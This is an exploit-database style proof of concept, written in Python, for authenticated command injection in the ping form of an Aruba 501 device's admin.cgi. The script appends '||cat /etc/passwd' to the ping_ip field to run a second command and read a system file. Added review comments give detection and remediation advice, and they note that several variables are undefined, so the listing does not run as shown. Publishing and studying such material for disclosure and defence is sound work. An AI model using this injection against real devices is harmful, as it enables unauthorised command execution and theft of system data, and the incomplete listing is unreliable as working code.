Exploits / Vulnerability Discovered : 2024-08-24 |
Type : webapps |
Platform : linux
This proof of concept for an authenticated remote command execution (RCE) vulnerability in the Aruba 501 is provided for educational purposes only; anyone who uses it does so at their own risk.
[+] Code ...
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux
import requests
from requests.auth import HTTPBasicAuth
# Proof of concept for an authenticated command injection in the ping
# diagnostic of admin.cgi: it logs in, submits the ping form with a shell
# operator and a command appended to the target address, then looks for the
# command's output in the HTTP response headers.
#
# NOTE(review): `session`, `login_url`, `login_headers`, `login_payload` and
# `base_url` are not defined anywhere in this listing, and the original
# indentation was lost; the nesting below is reconstructed from the if/else
# pairs. The script does not run as shown.
#
# Defender notes:
#   * The request needs a valid admin session, so exposure depends on who can
#     reach the management interface and on the strength of its credentials.
#     Restrict that interface to a management network and apply the vendor's
#     firmware fix.
#   * Detection: a POST to /admin.cgi?action=ping whose `ping_ip` field holds
#     anything other than an address or hostname (for example `|`, `;`, `&`,
#     `$` or a backtick) is a strong indicator in web or proxy logs.
#   * Root cause (presumably; the device-side code is not shown): `ping_ip` is
#     interpolated into a shell command line without validation. The fix on
#     the device side is to parse the field as a strict IP address or hostname
#     and run ping with an argument vector instead of a shell.

# Login to the system
# verify=False turns off TLS certificate validation for this request.
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)
# Check if login was successful
# Success is inferred from HTTP 200 plus the absence of the text
# "login failed" (case-insensitive) in the body.
if response.status_code == 200 and "login failed" not in response.text.lower():
    print("Login successful!")
    # The command to be executed on the device
    command = "cat /etc/passwd"
    # `||` is the shell OR operator: what follows it is treated as a second
    # command instead of as part of the address. This is the injection point.
    ping_ip = f"4.2.2.4||{command}"
    # Data to be sent in the POST request
    # Form fields of the ping page; only `ping_ip` carries the injected value.
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping"
    }
    # Headers to be sent with the request
    # Origin and Referer are set to the device's own ping page.
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close"
    }
    # Sending the HTTP POST request to exploit the vulnerability
    exploit_url = f"{base_url}/admin.cgi?action=ping"
    response = session.post(exploit_url, headers=headers, data=data, verify=False)
    # Success heuristic: the substring "root" in any response header value.
    # Per the message below, the command output is reflected in the headers.
    # NOTE(review): any unrelated header containing "root" also matches, so
    # this check can report a false positive.
    if any("root" in value for value in response.headers.values()):
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")
else:
    print("Login failed. Please check the credentials and try again.")
# Print the response headers for further analysis
# NOTE(review): the nesting of this line is ambiguous in the flattened
# listing; it is placed at top level here (TODO confirm). At top level it
# prints the headers of whichever response was assigned last, which is the
# login response when the login failed.
print(response.headers)